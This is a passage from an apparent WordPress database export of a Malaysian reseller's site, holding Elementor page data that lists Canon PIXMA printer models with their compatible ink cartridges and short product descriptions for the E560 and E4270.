Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6970,3309,'_wp_page_template','template-fullwidth.php'),(6971,3309,'_elementor_edit_mode','builder'),(6972,3309,'_elementor_template_type','post'),(6973,3309,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" 